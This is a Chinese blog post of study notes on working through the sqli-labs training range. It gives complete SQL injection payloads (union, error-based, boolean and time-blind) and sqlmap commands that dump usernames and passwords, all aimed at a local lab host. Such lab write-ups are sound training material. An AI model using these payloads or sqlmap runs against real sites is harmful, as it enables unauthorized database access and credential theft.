sqllab靶场通过,及sql注入总结(注入点,sqlmap使用)

最新推荐文章于 2024-08-02 07:03:33 发布
最新推荐文章于 2024-08-02 07:03:33 发布
阅读量1.4k 收藏 18
点赞数 52
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/140394333
版权

Sql注入笔记

思维导图

注入类型

普通注入

报错注入

盲注

SQL写马注入

普通注入

靶场练习

https://github.com/Audi-1/sqli-labs

注入流程

1,通过and 1=1得到报错类型(int,string)

2,得到闭合方式,order by 猜测数据库字段数

3.得到union的select列数,group by

4,得到回显位置

union注入

库:union select 1,2,database()

表:union select 1,2,group_concat(table_name) from information_shcema.tables where table_schema=database()

字段:union select 1,2,group_concat(column_name) from information_schema.columns where table_column='users' and table_schema=database()

字段内容: union select 1,2,group_concat(username,password) from users

报错注入:

1.extractvalue报错:

extractvalue(1,concat('~',(select...))

库:?id=-1' and 1=extractvalue(1,concat(0x7e,(select substring(database(),1,10))))--+

表:?id=-1' and 1=extractvalue(1,concat(0x7e,(select substring(group_concat(table_name),20,23)from information_schema.tables where table_schema=database())))--+

字段:?id=100' and 1=extractvalue(1,concat(0x7e,(select substring(group_concat(column_name),1,30) from information_schema.columns where table_name='users' and table_schema='security')))--+

字段内容:?id=-1' and 1=extractvalue(1,concat(0x7e,(select substring(group_concat(username,'~',password),1,20)from users)))--+

靶场示例

http://sql/Less-1/?id=1 and 1=2

得到注入类型为string

http://sql/Less-1/?id=1”   未报错

http://sql/Less-1/?id=1’    报错

http://sql/Less-1/?id=1’--+   未报错判断回显方式

得到单引号未闭合方式

order by猜测

http://sql/Less-1/?id=1' order by 3--+

http://sql/Less-1/?id=1' order by 4--+

union select  得到回显字段位置

http://sql/Less-1/?id=-1' union select 1,2,3 --+

http://sql/Less-1/?id=-1' union select 1,database(),version() --+

database()得到数据库version() 得到数据库版本

group_concat(table_name)得到对应数据库的表名

http://sql/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= 'security'),3--+

查看到users的字段

http://sql/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users'),3 --+

查看字段内容

http://sql/Less-1/?id=-1' union select 1,group_concat(concat_ws(0x3a,username,password)),3 from security.users --+

报错注入

原理及函数

报错注入:

1. extractvalue:

extractvalue函数用于从XML文档中提取特定的值。它接受两个参数,第一个参数是要提取值的XML文档,第二个参数是XPath表达式,用于指定要提取的值的位置。该函数将返回符合XPath表达式的节点的值。

2. updatexml:

updatexml函数用于更新XML文档中特定节点的值。它接受三个参数,第一个参数是要更新的XML文档,第二个参数是XPath表达式,用于指定要更新的节点的位置,第三个参数是新的节点值。该函数将返回更新后的XML文档。

3. floor:

floor函数用于向下取整,将一个数值向下取整为最接近的整数。它接受一个参数,即要进行取整操作的数值,返回最接近的小于或等于该数值的整数。例如,floor(3.8)将返回3,floor(4.2)将返回4。

2.updataxml报错:

updataxml(1,2,3)同上

库:?id=1" and 1=updatexml(1,concat(0x7e,(select substring(database(),1,10))),3)--+

表:?id=1" and 1=updatexml(1,concat(0x7e,(select substring(group_concat(table_name),1,23)from information_schema.tables where table_schema=database())),3)--+

字段:?id=1" and 1=updatexml(1,concat(0x7e,(select substring(group_concat(column_name),1,30) from information_schema.columns where table_name='users' and table_schema='security')),3)--+

字段内容:?id=-1" and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,'~',password),1,20)from users)),3)--+

less_6,less_5,floor报错注入

爆用户

库:?id=-1' union select 1,count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a--+

表:?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(table_name)from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a--+

字段:?id=-1' union select 1,count(*),concat_ws('-',(select group_concat(column_name)from information_schema.columns where table_name='users' and table_schema='security'),floor(rand(0)*2)) as a from information_schema.tables group by a--+

字段内容:?id=-1' union select 1,count(*),concat_ws('-',(select concat(username,'~',password)from users limit 1,1),floor(rand(0)*2)) as a from information_schema.tables group by a--+

靶场示例:

报错注入得到数据库

http://sql/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

http://sql/Less-5/?id=1' and 1=updatexml(1,concat(0x7e,(select substring(database(),1,30))),3)--+

http://sql/Less-5/?id=1' and 1=updatexml(1,concat(0x7e,(select substring(group_concat(table_name),1,23)from information_schema.tables where table_schema=database())),3)--+

字段

http://sql/Less-5/?id=1' and 1=updatexml(1,concat(0x7e,(select substring(group_concat(column_name),1,30) from information_schema.columns where table_name='users' and table_schema='security')),3)--+

字段值

http://sql/Less-5/?id=-1' and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,'~',password),1,30)from users)),3)--+

布尔盲注(第8关)

概念:

这种页面只会显示成功和错误两个状态的页面,可以通过布尔盲注来不断尝试猜测出数据

利用上面的那些函数我们可以通过不断的变换范围来观察页面的响应来不断判断,直到判断到最后可以确定到一个值

通俗的讲就分为正确和错误

判断数据库长度

流程:

第一步:注入点测试

第二步:猜数据库名长度

第三步:猜数据库名(ASCII)

第四步:猜表名

第五步:猜字段名

第六步:猜数据

http://sql/Less-8/?id=1' and (select length(database())>1) and 1=1  --+ true

猜测数据库的名字(第几个的ASCII值)

http://sql/Less-8/?id=1' and ((select ascii(substr(database(),1,1)))>114) and 1=1 --+ true

猜表长(第3+1个表的长度为几)

id=1' and length(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1))=5--+

猜表名猜第四个表的首字母

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3,1),1,1))=115--+

猜字段(猜第一个字段的字母)

id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))=117--+

猜数据(第一行的)

http://sql/Less-8/?id=1' and (ascii(substr(( select  id users limit 0,1),1,1)))<80--+

通常用二分法写python脚本判断,或者sqlmap跑结果

python sqlmap.py -u “http://sql/Less-8/?id=1” --dbs

时间盲注(第9关)

通关加载页面是否延迟对到结果--sleep函数

第一步:注入点测试

第二步:猜数据库名长度

第三步:猜数据库名(ASCII)

第四步:猜表名

第五步:猜字段名

第六步:猜数据

  1. 判断版本

http://sql/Less-9/?id=1'and if(substr(version(),1,1)=5,sleep(4),null) --+

  1. 判断数据库长度

http://sql/Less-9/?id=1' and if(length(database())=8,sleep(5),1) --+

3、判断数据库(第一个字母ASCII)

?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+

4、判断表名

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1) --+

  1. 判断字段

?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=101,sleep(5),1) --+

6、判断字段内容

?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(5),1) --+

Sqlmap通关sqllab教程

工具sqlmap跑结果流程

1、判断注入点

python sqlmap.py -u http://sql/Less-1/?id=-1%27

或对抓包的txt文件进行操作

python sqlmap.py -r D:\桌面\r.txt

上述说明存在注入点

2、得到数据库

python sqlmap.py -u “http://sql/Less-2/?id=1” --dbs

爆破当前数据库

3、得到表

python sqlmap.py -u “http://sql/Less-2/?id=1” -D security --tables --dump

获取数据库对应的表

4、得到字段

python sqlmap.py -u “http://sql/Less-2/?id=1” -D security -T users --columns --dump

获取数据库对应的字段

5、得到字段内容

python sqlmap.py -u “http://sql/Less-2/?id=1” -D security -T users -C username,password --dump

接着的1-9关

都可以用该操作语句得到结果

python sqlmap.py -u “http://sql/Less-9/?id=1” --dbs

第10关提高level和risk来提高成功率

python sqlmap.py -u “http://sql/Less-9/?id=1” -level=2 --dbs

第11-17关POST抓包

python sqlmap.py -r D:\桌面\r.txt --dbs

通过页面回显值判断注入点

第18关

在ua头中存在注入点

python sqlmap.py -u “http://sql/Less-18/ --data="uname=admin&passwd=admin&submit=Submit" --user-agent="*" --thread=10 --dbs

第19关

python sqlmap.py -u “http://sql/Less-19/ --data="uname=admin&passwd=admin&submit=Submit" --referer="*" --thread=10 --dbs

第20关

手工:

登录成功后

python sqlmap.py -u http://sql/Less-20/ --cookie="uname=*" --dbs

第21关

手工:

=的url编码为%3D

') union select 1,2,database() #   进行base64编码

Sqlmap  --tamper 解码

python sqlmap.py -u http://sql/Less-21/ --cookie="uname=*" --dbs --tamper "base64encode.py"

第22关

修改了闭合方式   “

Sqlmap:

python sqlmap.py -u http://sql/Less-21/ --cookie="uname=*" --dbs --tamper "base64encode.py"

小春学渗透
关注
《WEB安全渗透测试》(10)SQL注入实战:XFF注入
午夜安全
10-24 1万+
《WEB安全渗透测试》(10)SQL注入实战:XFF注入 X-Forwarded-For简称XFF头,它代表了客户端的真实IP,通过修改他的值就可以伪造客户端IP。1)判断是否存在注入使用Burp的Repeater模块对请求进行修改,分别修改X-Forwarded-For的值如下所示:X-Forwarded-for: 127.0.0.1X-Forwarded-for: 127.0.0.1’X-Forwarded-for: 127.0.0.1' and 1=1#......
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1071
由于21/22雷同,都是需要登录后,注入通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
SQL注入测试的测试
狂飙兔的博客
10-13 3405
SQL注入测试的测试 1.输入域的值为数字型,用1=1,1=2法 若满足条件,则存在SQL注入漏洞,程序没有对提交的整型参数的合法性做过滤或判断 2.输入域的值为字符型,用 ’1=1’, ’1=2’ 法 若满足条件,则存在SQL注入漏洞,程序没有对提交的字符型参数的合法性做过滤或判断 3.输入域中的值为搜索型,用’and [查询条件] and ‘%’=’% 等 若满足条件,则存在SQ
SQL labs-SQL注入sqlmap使用
最新发布
先天无极编程圣体的博客
08-02 394
SQL注入是一种常见的Web安全漏洞,攻击者可以通过插入恶意的SQL代码来访问、修改或删除数据库中的数据。SQL注入的实验室通常用于学习和演练SQL注入的攻击和防护方法。SQLMap是一个开源的自动化SQL注入工具,用于检测和利用SQL注入漏洞,并接管数据库服务器。下面是使用SQLMap进行SQL注入的步骤和相关示例。
【史上最全sqlmap通关sqli-labs靶场教程】
DMXA的博客
10-15 3597
【史上最全sqlmap通关sqli-labs靶场教程】
SQL注入测试
无极低码
03-29 660
根据识别出的注入,构造特殊的输入字符串(payload),这些字符串包含SQL语法和控制逻辑,如单引号(')、双引号(")、分号(;这种测试模拟恶意用户向数据库查询中注入攻击性SQL代码的行为,以判断应用程序是否能够有效地防止未授权的数据访问、数据篡改或系统控制。使用自动化工具,如sqlmap、Burp Suite、OWASP ZAP等,可以更高效地进行SQL注入测试。如果应用程序的响应发生了变化,或者返回了异常的数据(如数据库结构、其他用户的数据等),则可能表明存在SQL注入漏洞。
渗透测试-SQL注入
weixin_53696027的博客
02-05 2490
sql注入是渗透测试重要的一部分,如果服务器存在sql注入漏洞将面临严重的威胁
SQL注入-SQLMAP基础使用
xdjxi的博客
02-19 2232
实验目的 了解SQLMAP实验步骤的工作原理,熟悉SQLMAP的常用命令,掌握SQLMAP的-r参数的基本使用方法。 实验步骤 本实验的目标是:以SQLi-Labs 网站的Less-4为入口,利用SQLMAP实施自动化SQL注入,获取 SQLi-Labs 网站的登录用户名和密码。 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs 网站Less-4。访问的URL为:http:/ / [靶机 IP]..
SQL-SqlMap注入
2201_75331136的博客
03-14 160
SQL-SqlMap注入
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1195
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入
sql注入知识
m0_55772907的博客
04-27 3678
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
Sqli-labs靶场第19关详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 742
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
安全测试—SQL注入
qq_41661843的博客
02-24 1464
SQL注入利用SQL注入漏洞,攻击者可以暴露数据库中的敏感信息,如用户账号、密码等字段值。
搜索型SQL注入SQL漏洞测试
weixin_44720762的博客
03-31 5451
搜索型注入原理和数据型,字符型注入相差不大,都是通过构造一个合法的语句,当参数传入后台后,造成一个合法的SQL语句闭合,从而将数据库里的数据遍历出来。 首先打开客户端寻找纯在SQL注入漏洞的注入。 通过提示可知,尝试输入一个提示字符进行搜索,z 这里我们输入字母’l’,可以看见后台给出的相关信息。 通过后台给出的数据,和平台给的输入提示。我们可以设想后台是否用了搜索逻辑去进行相关数据的搜索从而...
SQLmap使用方法,sqli-labs靶场
ZhangAweio的博客
04-10 525
SQL-map是一个非常强大的注入的工具,自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入,支持mysqlsql-service 等简单使用nmap进行查询数据。
最全sqlmap命令
gzy1616的博客
03-06 554
-search 搜索数据库名、表明、列名,需要与-D -T或-C 联用。--columns 在-D -T情况下输出表中所有列名。-C column 在-D -T情况下输出某列数据的值。--tables 在-D情况下输出库中所有表名。--file-dest 上传文件(指定目标机器路径)--file-write 上传文件(指定本地路径)
sqli-labs闯关(附python脚本和sqlmap使用
xixixi
09-20 3155
重新学这个的原因 sql注入生疏了 想学得更深入 学习写python脚本 开始前的说明 每关一个脚本 需寻找flag 每天更新 因为刚开始写python脚本,可能代码不够完美,请见谅。进度比较慢,请见谅。 第一关 手工注入: -1' order by 3 --+ -1' union select 1,database(),3 --+ -1' union select 1,...
sql_labs通关,手动加sqlmap
qq_47289634的博客
02-23 973
信息收集: 数据库版本:version()数据库名字:database() 数据库用户:user() 系统:@@version_compile_os MySQL5.0以上版本自带一个information_schema数据库,储存所有的数据库名表名列名 数据库中 . ()代表下一级 student.users 代表student数据库中的users表看我另外一篇,击下方蓝色字体sqlmap详细使用方法id=1,id=2返回类内容不同,输入的内容是带入到数据库里面查询了。 判断类型:这里我把源代码输出了
sqlmap通关sqli-labs靶场
06-28
### 回答1: SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D <database name> --tables ``` 最后,你可以使用以下命令读取数据表中的数据: ``` sqlmap -u <target URL> -D <database name> -T <table name> --dump ``` 请注意,在实际渗透测试中,使用SQLMap和其他工具需要遵循道德准则和法律规定。 ### 回答2: SQL注入是目前常见的一种攻击方式,它很容易对基于SQL的Database进行利用,最终获取Database中的敏感信息。为了更好地理解SQL注入攻击方式,学习和了解其渗透测试方式非常必要。而sqli-labs是一款SQL injection实验环境,旨在用来提高SQL技术的实际应用能力和渗透测试的技能。 在sqli-labs中,存在很多漏洞类型需要渗透测试,通过这些漏洞攻击我们可以得到不同的信息。要完成这些测试,我们需要一个工具来探测一个web应用程序中的SQL注入漏洞,这个工具就是SQLMAPSQLMAP工具是一个开源工具,用Python语言编写,接受界面式和命令行调用方式,功能非常强大。 下面是sqlmap通关sqli-labs靶场的步骤: 1. 下载并安装SQLMAP SQLMAP安装包的下载可以到官方网站上下载,或者使用Git Clone命令克隆仓库。安装过程中,需要依赖Python环境,所以需要先安装Python环境。 2. 下载sqli-labs sqli-labs的下载可以从官方网站或者GitHub上下载,解压并配置好环境。 3. 识别目标网站 使用命令行工具,进入SQLMAP所在的目录,输入命令:`python sqlmap.py -u <target-url>`,其中,target-url指的是sqli-labs中的URL。 4. 扫描漏洞 使用命令来扫描不同的漏洞,比如:`python sqlmap.py -u <target-url> --dbs`,表示对目标URL进行数据库的探测。 5. 选择漏洞 通过返回的扫描结果,选择需要攻击的漏洞。 6. 进行攻击 对选择的漏洞进行攻击,使用命令:`python sqlmap.py –-tamper=space2mysql -u <target-url> -p <vuln-field> --dbs`,其中,tamper参数是选用的注入脚本,space2mysql就是其中一个比较好用的注入脚本之一,vuln-field指的是目标网站的漏洞。 7. 数据库探测和获取数据 通过命令:`python sqlmap.py -u <target-url> --dbs`获取到可用的数据库,再使用命令:`python sqlmap.py -u <target-url> -D databaseName -T tableName --dump`来获取表中的数据。 通过上述步骤,sqlmap就可以在sqli-labs的攻击和测试中展示其强大的功能。需要注意的是,任何时候针对他人的web应用程序进行测试之前,务必获得允许进行渗透测试的正式授权。 ### 回答3: SQL注入是一种常见的安全漏洞,黑客可以利用它来攻击网站。为了更好地了解和防范这种攻击,我们可以通过搭建sqli-labs靶场来进行学习和实践,而SQLmap则是一款自动化SQL注入工具,可以大大提高注入的效率。现在,我将详细介绍如何通过SQLmap通关sqli-labs靶场。 第一步:下载sqli-labs和SQLmap 首先,我们需要先下载本地的sqli-labs靶场SQLmap工具。sqli-labs靶场可以从GitHub上下载,而SQLmap工具则可以从官网或GitHub上下载。 第二步:启动sqli-labs 我们需要启动sqli-labs靶场,进入其对应的文件夹中,运行命令“sudo ./logstart.sh”即可启动。 第三步:寻找sqli-labs中的注入漏洞 接下来,我们需要寻找sqli-labs中的注入漏洞,这可以通过用浏览器访问sqli-labs的web应用程序来完成。我们可以利用输入一些特殊符号来调用SQL语句,并观察服务器的返回结果。如果返回结果与预期不符,则可能存在注入漏洞。 第四步:使用SQLmap进行注入攻击 现在,我们已经找到存在漏洞的地方了,接下来就是使用SQLmap进行注入攻击。在命令行中输入“python sqlmap.py -u [漏洞URL] --dbs”即可进行漏洞测试。如果存在注入漏洞,则SQLmap会在其中进行攻击并自动检测到被攻击的数据库。 第五步:进一步利用SQLmap 此时,我们已经成功地利用SQLmap进行了注入攻击,接下来可以进一步利用SQLmap进行数据抓取、渗透等操作。我们可以通过输入“python sqlmap.py -u [漏洞URL] -D [数据库名] -T [表名] --dump”来进行数据抓取操作,获取数据并进行进一步的分析。 总结: 通过以上步骤,我们可以利用SQLmap成功地通关sqli-labs靶场。值得注意的是,在进行学习和实践过程中,一定要注意合法性和安全性,避免非法入侵和攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值